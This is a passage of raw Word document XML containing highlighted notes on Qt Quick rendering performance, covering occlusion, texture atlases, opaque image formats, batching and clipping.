          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>occlusion detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If something is not supposed to be visible, it should not be shown. </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item::visible: false</w:t>
      </w:r>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for items that should not be drawn</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>primary reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for not adding such logic is that </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it adds additional cost</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which would also hurt applications that took care in behaving well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Make sure the texture atlas is used</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Image and</w:t>
      </w:r>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2081" w:anchor="borderimage" w:history="1">
        <w:r w:rsidRPr="00376591">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>BorderImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items will use it unless the image is too large</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>textures created in C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:r w:rsidR="00376591" w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2082" w:anchor="CreateTextureOption-enum" w:history="1">
        <w:r w:rsidRPr="00376591">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::TextureCanUseAtlas</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">when calling </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC420B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>QQuickWindow::createTexture()</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. By setting the environment variable</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00376591">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSG_ATLAS_OVERLAY</w:t>
      </w:r>
      <w:r w:rsidR="00376591">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">all atlas textures will be colorized so they are easily </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identifiable in the application</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Use opaque primitives where possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Opaque primitives are </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>faster</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to process in the renderer and </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>faster</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to draw on the GPU. For instance, P</w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NG files will often have an alpha channel, even though each pixel is fully opaque</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JPG files are always opaque</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When providing images to a</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2083" w:history="1">
        <w:r w:rsidRPr="005846EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickImageProvider</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or creating images with</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2084" w:anchor="createTextureFromImage" w:history="1">
        <w:r w:rsidRPr="005846EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQuickWindow::createTextureFromImage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), let the image have</w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2085" w:anchor="Format-enum" w:history="1">
        <w:r w:rsidRPr="005846EB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QImage::Format_RGB32</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, when possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005846EB" w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu this recommendation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="005846EB" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Be aware of that overlapping compond items, like in the illustration above, can not be batched.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clipping breaks batching</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Never use on a per-item basis</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>inside tables cells</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item delegates or similar</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="005846EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
